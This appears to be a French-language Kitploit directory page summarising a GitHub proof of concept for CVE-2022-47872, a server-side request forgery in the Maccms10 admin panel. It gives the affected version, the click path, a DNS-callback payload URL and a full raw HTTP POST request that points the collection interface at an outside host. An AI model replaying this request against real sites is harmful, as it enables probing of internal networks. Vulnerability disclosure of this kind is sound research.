Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-47872 — Preuve de concept pour la vulnérabilité SSRF dans le panneau d'administration de Maccms10, démontrant l'exploitation via la collecte d'interface personnalisée avec les détails de la requête HTTP. | Kitploit
Outils/GitHubGitHub/cedric1314/cve-2022-47872
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubcedric1314/cve-2022-47872

CVE-2022-47872

Preuve de concept pour la vulnérabilité SSRF dans le panneau d'administration de Maccms10, démontrant l'exploitation via la collecte d'interface personnalisée avec les détails de la requête HTTP.

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

#CVE-2022-47872

maccms10 admin+ attaques SSRF

Aperçu

Informations sur le site Web du fabricant : https://maccms.pro

Adresse de téléchargement du code source : https://github.com/maccmspro/maccms10.git

Version affectée : V2021.1000.2000

Image

2. Détails de la vulnérabilité

https://github.com/maccmspro/maccms10/issues/22

Accédez à l'arrière-plan, cliquez sur Collecter --> Interface personnalisée --> Adresse de l'interface,

Dans la zone de nom, saisissez payload1:http://7ca8e96e.dns.1433.eu.org.

Cela peut provoquer des attaques SSRF.

Nom de la vulnérabilité : attaques SSRF

Niveau de vulnérabilité : Risque moyen

Emplacement de la vulnérabilité : cliquez sur Collecter --> Interface personnalisée --> Adresse de l'interface

3. Vulnérabilités récurrentes et

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: /

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect_id=&token=8d639020c85bde89f9276381d2460046&collect_name=1111&collect_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect_param=%26q%3D1&collect_type=1&collect_mid=1&collect_opt=Ø&collect_filter=0&collect_filter_from=

Image

Image

Image

Image

Image

Télécharger l’outil